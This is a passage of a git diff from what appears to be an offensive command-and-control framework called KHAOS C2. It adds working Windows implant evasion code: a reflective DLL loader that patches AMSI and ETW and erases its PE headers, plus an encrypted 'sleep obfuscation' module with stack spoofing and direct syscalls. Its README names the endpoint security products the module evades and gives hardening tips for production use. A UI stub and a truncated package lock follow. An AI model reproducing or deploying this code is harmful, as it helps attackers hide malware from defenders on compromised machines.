16) ^ (seed << 13); + if (!seed || seed == 0x00002B992DDFA232ULL) seed ^= 0xFACEB00CFACEB00CULL; + *ck = seed; + } + } + } + + // 12. AMSI + if (fVP) { + HMODULE hAmsi = fLLA("amsi.dll"); + if (hAmsi) { + LPVOID scan = (LPVOID)fGPA(hAmsi, "AmsiScanBuffer"); + if (scan) { + DWORD old = 0; + if (fVP(scan, 3, PAGE_EXECUTE_READWRITE, &old)) { + ((uint8_t *)scan)[0] = 0x31; + ((uint8_t *)scan)[1] = 0xC0; + ((uint8_t *)scan)[2] = 0xC3; + fVP(scan, 3, old, &old); + } + } + } + } + + // 13. ETW - patch EtwEventWrite: xor eax,eax; ret + if (fVP) { + ULONG_PTR etw = _rl_get_proc_h(ntdll, H_EtwEventWrite); + if (etw) { + DWORD old = 0; + if (fVP((LPVOID)etw, 3, PAGE_EXECUTE_READWRITE, &old)) { + ((uint8_t *)etw)[0] = 0x31; + ((uint8_t *)etw)[1] = 0xC0; + ((uint8_t *)etw)[2] = 0xC3; + fVP((LPVOID)etw, 3, old, &old); + } + } + } + + // 14. TLS - alloc slot, write index, call callbacks before DllMain + { + DWORD tlsRva = dstNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS].VirtualAddress; + if (tlsRva) { + PIMAGE_TLS_DIRECTORY tlsDir = (PIMAGE_TLS_DIRECTORY)(dst + tlsRva); + + // alloc TLS slot + typedef DWORD (WINAPI *pTlsAlloc_t)(void); + pTlsAlloc_t fTlsAlloc = (pTlsAlloc_t)fGPA((HMODULE)k32, "TlsAlloc"); + if (fTlsAlloc && tlsDir->AddressOfIndex) { + DWORD tlsIdx = fTlsAlloc(); + if (tlsIdx != TLS_OUT_OF_INDEXES) + *(DWORD *)(ULONG_PTR)tlsDir->AddressOfIndex = tlsIdx; + } + + // call each callback with DLL_PROCESS_ATTACH + if (tlsDir->AddressOfCallBacks) { + PIMAGE_TLS_CALLBACK *cb = (PIMAGE_TLS_CALLBACK *)(ULONG_PTR)tlsDir->AddressOfCallBacks; + while (*cb) { + (*cb)((PVOID)dst, DLL_PROCESS_ATTACH, NULL); + cb++; + } + } + } + } + + // 15. flush icache + if (fFIC && fGCP) fFIC(fGCP(), (LPVOID)dst, imgSz); + + // 16. DllMain + pDllMain_t fDllMain = (pDllMain_t)(dst + dstNt->OptionalHeader.AddressOfEntryPoint); + fDllMain((HINSTANCE)dst, DLL_PROCESS_ATTACH, NULL); + + // 17. erase PE headers + if (fVP || ssn_protect != 0xFFFF) { + if (ssn_protect != 0xFFFF) { + PVOID addr = (PVOID)dst; + SIZE_T sz = (SIZE_T)hdrSz; + ULONG old = 0; + _hg_ssn = ssn_protect; + ((pNtProtectVm_t)_rl_hg_call)((HANDLE)(LONG_PTR)-1, &addr, &sz, PAGE_READWRITE, &old); + } else { + DWORD old; + fVP((LPVOID)dst, hdrSz, PAGE_READWRITE, &old); + } + + volatile uint8_t *p = (volatile uint8_t *)dst; + for (DWORD i = 0; i < hdrSz; i++) p[i] = 0; + if (ssn_protect != 0xFFFF) { + PVOID addr = (PVOID)dst; + SIZE_T sz = (SIZE_T)hdrSz; + ULONG old = 0; + _hg_ssn = ssn_protect; + ((pNtProtectVm_t)_rl_hg_call)((HANDLE)(LONG_PTR)-1, &addr, &sz, PAGE_READONLY, &old); + } else { + DWORD old; + fVP((LPVOID)dst, hdrSz, PAGE_READONLY, &old); + } + } + + return dst; +} diff --git a/techniques/reflect-dll/tools/gen_hashes.py b/techniques/reflect-dll/tools/gen_hashes.py new file mode 100644 index 0000000..094c4bf --- /dev/null +++ b/techniques/reflect-dll/tools/gen_hashes.py @@ -0,0 +1,20 @@ +def rl_hash(s): + h = 0 + for c in s.upper(): + h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF + h = (h + ord(c)) & 0xFFFFFFFF + return h + +apis = [ + 'kernel32.dll', + 'LoadLibraryA', + 'GetProcAddress', + 'VirtualAlloc', + 'VirtualProtect', + 'FlushInstructionCache', + 'GetCurrentProcess', +] + +for a in apis: + key = a.replace('.', '_') + print('#define HASH_%-30s 0x%08XULL // %s' % (key, rl_hash(a), a)) diff --git a/techniques/sleep-obf/Makefile b/techniques/sleep-obf/Makefile new file mode 100644 index 0000000..34316ec --- /dev/null +++ b/techniques/sleep-obf/Makefile @@ -0,0 +1,28 @@ +CC = x86_64-w64-mingw32-gcc +CFLAGS = -O2 -Wall -Wextra \ + -Iinclude \ + -masm=att \ + -fno-asynchronous-unwind-tables \ + -fno-ident \ + -fno-stack-protector +LDFLAGS = -lbcrypt -lntdll + +SRC = src/sleep_obf.c src/demo.c +OBJ = $(patsubst src/%.c, build/%.o, $(SRC)) +TARGET = build/demo.exe + +all: build $(TARGET) + +build: + mkdir -p build + +build/%.o: src/%.c + $(CC) $(CFLAGS) -c $< -o $@ + +$(TARGET): $(OBJ) + $(CC) $(CFLAGS) $(OBJ) -o $@ $(LDFLAGS) + +clean: + rm -rf build + +.PHONY: all clean diff --git a/techniques/sleep-obf/README.md b/techniques/sleep-obf/README.md new file mode 100644 index 0000000..e2be1e1 --- /dev/null +++ b/techniques/sleep-obf/README.md @@ -0,0 +1,117 @@ +# sleep-obf + +Encrypted sleep obfuscation for Windows x64 implants. + +Encrypts the calling module's `.text` section with a `BCryptGenRandom` key, marks it `PAGE_NOACCESS`, pivots to a fake thread context waiting on `NtWaitForSingleObject`, and decrypts on wakeup. Stack scan during sleep shows a legitimate `NtWaitForSingleObject` call chain, not your implant. + +Extracted from [KHAOS C2](https://github.com/28Zaaky/khaos-c2). + +--- + +## How it works + +``` +RtlCaptureContext() <- save real context (RIP points back here) + | + v +CreateThread(_timer_thread) <- fires Sleep(ms) then SetEvent(done) + | + v +XOR .text with 32-byte BCryptGenRandom key +VirtualProtect .text -> PAGE_NOACCESS +Rewrite TEB StackBase/StackLimit -> fake stack + | + v +NtContinue(fake_ctx) <- pivot: RIP=NtWaitForSingleObject, RSP=fake_stack + | stack now shows: NtWait -> RtlUserThreadStart+0x10 + v +[EVENT FIRES after ms] + | + v +_sleep_trampoline() <- on fake stack, called as return from NtWait + | + v +XOR .text again (decrypt) +VirtualProtect .text -> PAGE_EXECUTE_READ +Restore TEB stack bounds +NtContinue(real_ctx) <- resume exactly where RtlCaptureContext was called +``` + +Key properties: + +- **Fake call stack**: during sleep, the thread stack shows `NtWaitForSingleObject` called from `RtlUserThreadStart+0x10`. No implant frames visible. +- **TEB stack bounds rewritten**: `StackBase`/`StackLimit` in the TEB point to the fake stack so ETW stack walks stay within valid bounds. +- **Timer thread in `.run` section**: timer thread code and trampoline are in a separate `.run` section, not `.text`. They keep executing while `.text` is `NOACCESS`. +- **No IAT thunks in critical path**: `VirtualProtect`, `Sleep`, `SetEvent` are resolved to direct function addresses and stored in `obf_ctx_t`. IAT thunks live in `.text` and would fault if called during sleep. +- **NtProtectVirtualMemory** is used instead of `VirtualProtect` to protect the protect call itself from userland hooks. +- **ACG fallback**: if the permission round-trip fails (e.g. ACG-enforced process), falls back to plain `Sleep()`. + +--- + +## Usage + +```c +#include "sleep_obf.h" + +// basic usage +sleep_obf(5000); // sleep 5 seconds with .text encrypted + +// optional: hook to arm ETW/AMSI hardware breakpoints on the timer thread +// (implement your own or use the hwbp-evasion technique) +g_sleep_obf_thread_hook = my_hwbp_arm_fn; +sleep_obf(5000); +``` + +--- + +## Build + +Requires MinGW-w64 cross-compiler. + +```bash +make +./build/demo.exe +``` + +On a Windows host with MSVC, adjust `CC`, link `bcrypt.lib` and `ntdll.lib`. + +--- + +## Limitations + +- x64 only. +- Requires the calling module to have a `.text` section (standard for PE files). +- Does not survive process suspension during the encryption window (between `CreateThread` and `NtContinue`) — this window is a few microseconds. +- DLLs with `DLL_THREAD_ATTACH` callbacks that touch `.text` will fault during timer thread creation if `.text` is already encrypted. The implementation creates the thread **before** encrypting to avoid this. + +### Kernel-mode AV (Kaspersky, ESET, etc.) + +Some AV products (notably Kaspersky Total Security / KAV) use kernel-mode callbacks that intercept `NtProtectVirtualMemory` calls targeting the process's own `.text` section. When detected, they terminate the thread via a kernel APC before the syscall returns. **No userland exception handler (VEH, SEH) can catch this** — the VEH is never invoked. + +The implementation handles this gracefully: the permission round-trip test (`PAGE_READWRITE` → restore) catches the failure and falls back to plain `Sleep()` before any encryption is attempted. The setjmp/VEH in `_nt_prot` catches the exception on products that raise it (Defender, etc.); for products that issue a kernel APC (Kaspersky), the fallback relies on a clean thread termination message in the OS. + +**Testing**: run in a VM without AV, or with AV excluded/disabled, to observe the full sleep obfuscation behavior. The technique is effective against userland-hook-based EDRs (Microsoft Defender, CrowdStrike Falcon in standard config, SentinelOne in detect-only mode). + +--- + +## Operational notes + +This PoC uses `GetModuleHandleA`/`GetProcAddress` with plaintext strings. In production: + +- Replace with a PEB walk (`__readgsqword(0x60)`) to resolve modules without touching the IAT or leaving strings in `.rdata`. +- Encrypt sensitive string literals (see EVS XOR in KHAOS C2). + +--- + +## Credits + +Technique originally described by [Ekko](https://github.com/Cracked5pider/Ekko) (Cracked5pider). This implementation extends it with: + +- `NtProtectVirtualMemory` instead of `VirtualProtect` for the permission flip +- TEB `StackBase`/`StackLimit` rewrite for ETW stack walk validity +- Fallback path for ACG-enforced environments +- Thread hook integration point for HWBP-based ETW/AMSI bypass + +--- + +*Part of [KHAOS C2](https://github.com/28Zaaky/khaos-c2) — by [28Zaaky](https://github.com/28Zaaky)* diff --git a/techniques/sleep-obf/include/sleep_obf.h b/techniques/sleep-obf/include/sleep_obf.h new file mode 100644 index 0000000..caf5569 --- /dev/null +++ b/techniques/sleep-obf/include/sleep_obf.h @@ -0,0 +1,22 @@ +#pragma once +#include + +/* + * Optional hook called with the timer thread handle before .text is encrypted. + * Use to arm hardware breakpoints (ETW/AMSI bypass) on the timer thread. + * Set to NULL if not needed. + */ +typedef void (*sleep_obf_thread_hook_t)(HANDLE hThread); +extern sleep_obf_thread_hook_t g_sleep_obf_thread_hook; + +/* + * sleep_obf() — encrypted sleep + * + * Encrypts the calling module's .text section with a BCryptGenRandom key, + * marks it PAGE_NOACCESS, switches to a fake thread context pointing to + * NtWaitForSingleObject on a fake stack, and restores state on wakeup. + * + * Falls back to plain Sleep() if any setup step fails (ACG, section not + * found, allocation failure). + */ +void sleep_obf(DWORD ms); diff --git a/techniques/sleep-obf/src/demo.c b/techniques/sleep-obf/src/demo.c new file mode 100644 index 0000000..7890892 --- /dev/null +++ b/techniques/sleep-obf/src/demo.c @@ -0,0 +1,26 @@ +#include "sleep_obf.h" +#include +#include + +int main(void) +{ + printf("[*] starting — sleeping 5 seconds with .text obfuscation\n"); + fflush(stdout); + + sleep_obf(5000); + + printf("[+] woke up — .text restored, execution resumed\n"); + fflush(stdout); + + /* loop to show repeated sleeps work */ + for (int i = 0; i < 3; i++) { + printf("[*] loop %d — sleeping 2 seconds\n", i + 1); + fflush(stdout); + sleep_obf(2000); + printf("[+] loop %d — resumed\n", i + 1); + fflush(stdout); + } + + printf("[+] done\n"); + return 0; +} diff --git a/techniques/sleep-obf/src/sleep_obf.c b/techniques/sleep-obf/src/sleep_obf.c new file mode 100644 index 0000000..c59313f --- /dev/null +++ b/techniques/sleep-obf/src/sleep_obf.c @@ -0,0 +1,323 @@ +#include "sleep_obf.h" +#include +#include +#include +#include +#include + +/* + * PoC note: this file uses GetModuleHandleA/GetProcAddress for simplicity. + * In production, replace with a PEB walk to keep these strings off the IAT + * and out of .rdata. See agent/src/evasion/evasion.c in KHAOS C2 for the + * hardened version. + */ + +sleep_obf_thread_hook_t g_sleep_obf_thread_hook = NULL; + +typedef NTSTATUS (NTAPI *NtContinue_t) (PCONTEXT, BOOLEAN); +typedef NTSTATUS (NTAPI *NtWait_t) (HANDLE, BOOLEAN, PLARGE_INTEGER); +typedef VOID (NTAPI *RtlCaptureContext_t) (PCONTEXT); +typedef BOOL (WINAPI *VirtualProtect_t) (LPVOID, SIZE_T, DWORD, PDWORD); +typedef void (WINAPI *Sleep_t) (DWORD); +typedef BOOL (WINAPI *SetEvent_t) (HANDLE); +typedef NTSTATUS (NTAPI *NtProtectVM_t) (HANDLE, PVOID *, PSIZE_T, ULONG, PULONG); + +#define FAKE_STACK_SZ 0x10000 + +typedef struct { + LPVOID text_base; + SIZE_T text_size; + BYTE key[32]; + DWORD sleep_ms; + HANDLE done; + NtContinue_t ntcontinue; + LARGE_INTEGER timeout; + LPVOID fake_stack_mem; + PVOID orig_stack_base; + PVOID orig_stack_limit; + VirtualProtect_t fn_vprot; + Sleep_t fn_sleep; + SetEvent_t fn_setevent; +} obf_ctx_t; + +/* NtProtectVirtualMemory wrapper — bypasses VirtualProtect hooks. + * Uses setjmp/VEH to catch exceptions injected by kernel-mode AV drivers + * (e.g. Kaspersky) that block .text permission changes at kernel level. + * On such systems the roundtrip check fails gracefully and sleep_obf + * falls back to plain Sleep(). */ +static NtProtectVM_t s_ntpvm = NULL; +static jmp_buf s_prot_jmp; +static volatile LONG s_in_prot = 0; + +static LONG WINAPI _prot_veh(EXCEPTION_POINTERS *ep) +{ + if (!s_in_prot) return EXCEPTION_CONTINUE_SEARCH; + if (ep->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION || + ep->ExceptionRecord->ExceptionCode == 0xC0000022) { + longjmp(s_prot_jmp, 1); + } + return EXCEPTION_CONTINUE_SEARCH; +} + +static BOOL _nt_prot(LPVOID addr, SIZE_T sz, DWORD prot, DWORD *old) +{ + if (!s_ntpvm) { + s_ntpvm = (NtProtectVM_t)(void *)GetProcAddress( + GetModuleHandleA("ntdll.dll"), "NtProtectVirtualMemory"); + } + if (!s_ntpvm) return FALSE; + + PVOID veh = AddVectoredExceptionHandler(1, _prot_veh); + InterlockedExchange(&s_in_prot, 1); + + if (setjmp(s_prot_jmp) != 0) { + /* exception caught — NtPVM blocked by kernel AV driver */ + InterlockedExchange(&s_in_prot, 0); + if (veh) RemoveVectoredExceptionHandler(veh); + return FALSE; + } + + PVOID base = addr; + SIZE_T rsz = sz; + ULONG _old = 0; + NTSTATUS st = s_ntpvm((HANDLE)(LONG_PTR)-1, &base, &rsz, (ULONG)prot, &_old); + + InterlockedExchange(&s_in_prot, 0); + if (veh) RemoveVectoredExceptionHandler(veh); + + if (st != 0) return FALSE; + if (old) *old = (DWORD)_old; + return TRUE; +} + +/* Read/write TEB fields via GS segment register */ +__attribute__((section(".run"))) +static inline PVOID _teb_read_ptr(DWORD64 off) +{ + PVOID v; + __asm__ __volatile__("movq %%gs:(%1), %0" : "=r"(v) : "r"(off)); + return v; +} + +__attribute__((section(".run"))) +static inline void _teb_write_ptr(DWORD64 off, PVOID val) +{ + __asm__ __volatile__("movq %0, %%gs:(%1)" :: "r"(val), "r"(off) : "memory"); +} + +/* Globals shared between main thread and trampoline */ +static CONTEXT s_saved_ctx = {0}; +static obf_ctx_t *s_obf_ctx = NULL; +static volatile LONG s_restore = 0; + +/* + * Timer thread: lives entirely in .run so it keeps executing while .text + * is PAGE_NOACCESS. Uses direct function pointers stored in obf_ctx_t, not + * IAT thunks (which sit in .text and would fault on access). + */ +__attribute__((section(".run"), noinline)) +static DWORD WINAPI _timer_thread(LPVOID arg) +{ + obf_ctx_t *c = (obf_ctx_t *)arg; + c->fn_sleep(c->sleep_ms); + c->fn_setevent(c->done); + return 0; +} + +/* + * Wakeup trampoline: called when NtWaitForSingleObject returns via the fake + * stack. Decrypts .text, restores TEB stack bounds, and resumes via NtContinue + * with the real saved context. + */ +__attribute__((section(".run"), noinline)) +static void _sleep_trampoline(void) +{ + obf_ctx_t *c = s_obf_ctx; + BYTE *p = (BYTE *)c->text_base; + SIZE_T n = c->text_size; + DWORD old; + + c->fn_vprot(p, n, PAGE_READWRITE, &old); + for (SIZE_T i = 0; i < n; i++) p[i] ^= c->key[i & 31]; + if (!c->fn_vprot(p, n, PAGE_EXECUTE_READ, &old)) + c->fn_vprot(p, n, PAGE_EXECUTE_READWRITE, &old); + + _teb_write_ptr(0x08, c->orig_stack_base); + _teb_write_ptr(0x10, c->orig_stack_limit); + + c->ntcontinue(&s_saved_ctx, FALSE); + __builtin_unreachable(); +} + +/* + * Encrypt .text, mark PAGE_NOACCESS, rewrite TEB stack bounds to the fake + * stack, then pivot to NtWaitForSingleObject via NtContinue. Never returns. + */ +__attribute__((section(".run"), noinline)) +static void _obf_sleep_tail(obf_ctx_t *ctx, CONTEXT *fake_ctx_ptr) +{ + BYTE *p = (BYTE *)ctx->text_base; + SIZE_T n = ctx->text_size; + DWORD old; + + for (SIZE_T i = 0; i < n; i++) p[i] ^= ctx->key[i & 31]; + ctx->fn_vprot(p, n, PAGE_NOACCESS, &old); + + _teb_write_ptr(0x08, (PVOID)((BYTE *)ctx->fake_stack_mem + FAKE_STACK_SZ)); + _teb_write_ptr(0x10, ctx->fake_stack_mem); + + ctx->ntcontinue(fake_ctx_ptr, FALSE); + __builtin_unreachable(); +} + +/* PE header walk to find own .text section */ +static void _find_section(const char *name, LPVOID *base, SIZE_T *sz) +{ + *base = NULL; *sz = 0; + BYTE *img = (BYTE *)GetModuleHandleA(NULL); + if (!img) return; + IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)img; + if (dos->e_magic != IMAGE_DOS_SIGNATURE) return; + IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)(img + dos->e_lfanew); + if (nt->Signature != IMAGE_NT_SIGNATURE) return; + IMAGE_SECTION_HEADER *sec = IMAGE_FIRST_SECTION(nt); + for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, sec++) { + int ok = 1; + for (int j = 0; j < 8; j++) { + char c = name[j]; + if (sec->Name[j] != (unsigned char)c) { ok = 0; break; } + if (!c) break; + } + if (ok) { + *base = img + sec->VirtualAddress; + *sz = sec->Misc.VirtualSize; + return; + } + } +} + +void sleep_obf(DWORD ms) +{ + LPVOID text_base = NULL; + SIZE_T text_size = 0; + _find_section(".text", &text_base, &text_size); + if (!text_base || !text_size) { Sleep(ms); return; } + + HMODULE hntdll = GetModuleHandleA("ntdll.dll"); + HMODULE hk32 = GetModuleHandleA("kernel32.dll"); + if (!hntdll || !hk32) { Sleep(ms); return; } + + NtContinue_t fn_cont = (NtContinue_t) GetProcAddress(hntdll, "NtContinue"); + NtWait_t fn_wait = (NtWait_t) GetProcAddress(hntdll, "NtWaitForSingleObject"); + RtlCaptureContext_t fn_cap = (RtlCaptureContext_t)GetProcAddress(hntdll, "RtlCaptureContext"); + PVOID fn_rts = GetProcAddress(hntdll, "RtlUserThreadStart"); + + VirtualProtect_t fn_vprot = (VirtualProtect_t) GetProcAddress(hk32, "VirtualProtect"); + Sleep_t fn_sleep = (Sleep_t) GetProcAddress(hk32, "Sleep"); + SetEvent_t fn_setevent= (SetEvent_t) GetProcAddress(hk32, "SetEvent"); + + if (!fn_cont || !fn_wait || !fn_cap || !fn_vprot || !fn_sleep || !fn_setevent) { + Sleep(ms); return; + } + + obf_ctx_t *ctx = (obf_ctx_t *)HeapAlloc( + GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(obf_ctx_t)); + if (!ctx) { Sleep(ms); return; } + + ctx->text_base = text_base; + ctx->text_size = text_size; + ctx->sleep_ms = ms; + ctx->ntcontinue = fn_cont; + ctx->fn_vprot = fn_vprot; + ctx->fn_sleep = fn_sleep; + ctx->fn_setevent = fn_setevent; + ctx->done = CreateEventA(NULL, FALSE, FALSE, NULL); + if (!ctx->done) { HeapFree(GetProcessHeap(), 0, ctx); Sleep(ms); return; } + + /* relative timeout in 100ns units with 5s buffer */ + ctx->timeout.QuadPart = -((LONGLONG)(ms + 5000) * 10000LL); + + BCryptGenRandom(NULL, ctx->key, sizeof(ctx->key), BCRYPT_USE_SYSTEM_PREFERRED_RNG); + + ctx->fake_stack_mem = VirtualAlloc(NULL, FAKE_STACK_SZ, + MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + if (!ctx->fake_stack_mem) { + CloseHandle(ctx->done); + HeapFree(GetProcessHeap(), 0, ctx); + Sleep(ms); + return; + } + + /* place trampoline as return address on fake stack top */ + PVOID *fake_top = (PVOID *)((BYTE *)ctx->fake_stack_mem + FAKE_STACK_SZ - 16); + fake_top[0] = (PVOID)_sleep_trampoline; + fake_top[1] = fn_rts ? (PVOID)((BYTE *)fn_rts + 0x10) : NULL; + + ctx->orig_stack_base = _teb_read_ptr(0x08); + ctx->orig_stack_limit = _teb_read_ptr(0x10); + + s_obf_ctx = ctx; + InterlockedExchange(&s_restore, 0); + + /* capture current context — RIP lands here after NtContinue restores it */ + fn_cap(&s_saved_ctx); + + /* two-pass: encrypt path sets s_restore=1; restore path sees it and cleans up */ + if (InterlockedCompareExchange(&s_restore, 0, 1) == 1) { + SecureZeroMemory(ctx->key, sizeof(ctx->key)); + CloseHandle(ctx->done); + VirtualFree(ctx->fake_stack_mem, 0, MEM_RELEASE); + HeapFree(GetProcessHeap(), 0, ctx); + return; + } + InterlockedExchange(&s_restore, 1); + + /* build fake context: RIP=NtWait, RSP=fake_stack */ + CONTEXT fake_ctx; + memcpy(&fake_ctx, &s_saved_ctx, sizeof(CONTEXT)); + fake_ctx.Rsp = (DWORD64)(uintptr_t)fake_top; + fake_ctx.Rip = (DWORD64)(uintptr_t)fn_wait; + fake_ctx.Rcx = (DWORD64)ctx->done; + fake_ctx.Rdx = FALSE; + fake_ctx.R8 = (DWORD64)(uintptr_t)&ctx->timeout; + + /* create timer thread before encrypting — DLL_THREAD_ATTACH needs .text */ + HANDLE ht = CreateThread(NULL, 0, _timer_thread, ctx, 0, NULL); + if (!ht) { + SecureZeroMemory(ctx->key, sizeof(ctx->key)); + CloseHandle(ctx->done); + VirtualFree(ctx->fake_stack_mem, 0, MEM_RELEASE); + HeapFree(GetProcessHeap(), 0, ctx); + InterlockedExchange(&s_restore, 0); + Sleep(ms); + return; + } + + /* optional hook: arm ETW/AMSI breakpoints on the timer thread */ + if (g_sleep_obf_thread_hook) + g_sleep_obf_thread_hook(ht); + + CloseHandle(ht); + + /* verify permission round-trip before committing (fails under ACG) */ + BYTE *p = (BYTE *)text_base; + DWORD old, dummy; + if (!_nt_prot(p, text_size, PAGE_READWRITE, &old)) + goto _fallback; + if (!_nt_prot(p, text_size, old, &dummy)) { + _nt_prot(p, text_size, old, &dummy); + goto _fallback; + } + _nt_prot(p, text_size, PAGE_READWRITE, &old); + + _obf_sleep_tail(ctx, &fake_ctx); + __builtin_unreachable(); + +_fallback: + SecureZeroMemory(ctx->key, sizeof(ctx->key)); + CloseHandle(ctx->done); + VirtualFree(ctx->fake_stack_mem, 0, MEM_RELEASE); + HeapFree(GetProcessHeap(), 0, ctx); + InterlockedExchange(&s_restore, 0); + Sleep(ms); +} diff --git a/ui/index.html b/ui/index.html new file mode 100644 index 0000000..0d13518 --- /dev/null +++ b/ui/index.html @@ -0,0 +1,16 @@ + + + + + + + KHAOS FRAMEWORK + + + +
+ + + diff --git a/ui/package-lock.json b/ui/package-lock.json new file mode 100644 index 0000000..5a9cd1a --- /dev/null +++ b/ui/package-lock.json @@ -0,0 +1,2281 @@ +{ + "name": "legitc2-ui", + "version": "1.0.0", + "lockfileVersion": 3, + "requires": true, + "packages": { + "": { + "name": "legitc2-ui", + "version": "1.0.0", + "dependencies": { + "@tauri-apps/api": "^2.11.0", + "@xterm/addon-fit": "^0.9.0", + "@xterm/xterm": "^5.3.0", + "axios": "^1.6.8", + "react": "^18.2.0", + "react-dom": "^18.2.0", + "zustand": "^4.5.2" + }, + "devDependencies": { + "@tauri-apps/cli": "^2.11.1", + "@tauri-apps/cli-win32-x64-msvc": "^2.11.1", + "@types/react": "^18.2.66", + "@types/react-dom": "^18.2.22", + "@vitejs/plugin-react": "^4.2.1", + "vite": "^5.2.0" + } + }, + "node_modules/@babel/code-frame": { + "version": "7.29.0", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.29.0.tgz", + "integrity": "sha512-9NhCeYjq9+3uxgdtp20LSiJXJvN0FeCtNGpJxuMFZ1Kv3cWUNb6DOhJwUvcVCzKGR66cw4njwM6hrJLqgOwbcw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/helper-validator-identifier": "^7.28.5", + "js-tokens": "^4.0.0", + "picocolors": "^1.1.1" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/compat-data": { + "version": "7.29.3", + "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.29.3.tgz", + "integrity": "sha512-LIVqM46zQWZhj17qA8wb4nW/ixr2y1Nw+r1etiAWgRM6U1IqP+LNhL1yg440jYZR72jCWcWbLWzIosH+uP1fqg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/core": { + "version": "7.29.0", + "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.29.0.tgz", + "integrity": "sha512-CGOfOJqWjg2qW/Mb6zNsDm+u5vFQ8DxXfbM09z69p5Z6+mE1ikP2jUXw+j42Pf1XTYED2Rni5f95npYeuwMDQA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/code-frame": "^7.29.0", + "@babel/generator": "^7.29.0", + "@babel/helper-compilation-targets": "^7.28.6", + "@babel/helper-module-transforms": "^7.28.6", + "@babel/helpers": "^7.28.6", + "@babel/parser": "^7.29.0", + "@babel/template": "^7.28.6", + "@babel/traverse": "^7.29.0", + "@babel/types": "^7.29.0", + "@jridgewell/remapping": "^2.3.5", + "convert-source-map": "^2.0.0", + "debug": "^4.1.0", + "gensync": "^1.0.0-beta.2", + "json5": "^2.2.3", + "semver": "^6.3.1" + }, + "engines": { + "node": ">=6.9.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/babel" + } + }, + "node_modules/@babel/generator": { + "version": "7.29.1", + "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.29.1.tgz", + "integrity": "sha512-qsaF+9Qcm2Qv8SRIMMscAvG4O3lJ0F1GuMo5HR/Bp02LopNgnZBC/EkbevHFeGs4ls/oPz9v+Bsmzbkbe+0dUw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/parser": "^7.29.0", + "@babel/types": "^7.29.0", + "@jridgewell/gen-mapping": "^0.3.12", + "@jridgewell/trace-mapping": "^0.3.28", + "jsesc": "^3.0.2" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-compilation-targets": { + "version": "7.28.6", + "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.28.6.tgz", + "integrity": "sha512-JYtls3hqi15fcx5GaSNL7SCTJ2MNmjrkHXg4FSpOA/grxK8KwyZ5bubHsCq8FXCkua6xhuaaBit+3b7+VZRfcA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/compat-data": "^7.28.6", + "@babel/helper-validator-option": "^7.27.1", + "browserslist": "^4.24.0", + "lru-cache": "^5.1.1", + "semver": "^6.3.1" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-globals": { + "version": "7.28.0", + "resolved": "https://registry.npmjs.org/@babel/helper-globals/-/helper-globals-7.28.0.tgz", + "integrity": "sha512-+W6cISkXFa1jXsDEdYA8HeevQT/FULhxzR99pxphltZcVaugps53THCeiWA8SguxxpSp3gKPiuYfSWopkLQ4hw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-module-imports": { + "version": "7.28.6", + "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.28.6.tgz", + "integrity": "sha512-l5XkZK7r7wa9LucGw9LwZyyCUscb4x37JWTPz7swwFE/0FMQAGpiWUZn8u9DzkSBWEcK25jmvubfpw2dnAMdbw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/traverse": "^7.28.6", + "@babel/types": "^7.28.6" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-module-transforms": { + "version": "7.28.6", + "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.28.6.tgz", + "integrity": "sha512-67oXFAYr2cDLDVGLXTEABjdBJZ6drElUSI7WKp70NrpyISso3plG9SAGEF6y7zbha/wOzUByWWTJvEDVNIUGcA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/helper-module-imports": "^7.28.6", + "@babel/helper-validator-identifier": "^7.28.5", + "@babel/traverse": "^7.28.6" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/helper-plugin-utils": { + "version": "7.28.6", + "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.28.6.tgz", + "integrity": "sha512-S9gzZ/bz83GRysI7gAD4wPT/AI3uCnY+9xn+Mx/KPs2JwHJIz1W8PZkg2cqyt3RNOBM8ejcXhV6y8Og7ly/Dug==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-string-parser": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.27.1.tgz", + "integrity": "sha512-qMlSxKbpRlAridDExk92nSobyDdpPijUq2DW6oDnUqd0iOGxmQjyqhMIihI9+zv4LPyZdRje2cavWPbCbWm3eA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-validator-identifier": { + "version": "7.28.5", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.28.5.tgz", + "integrity": 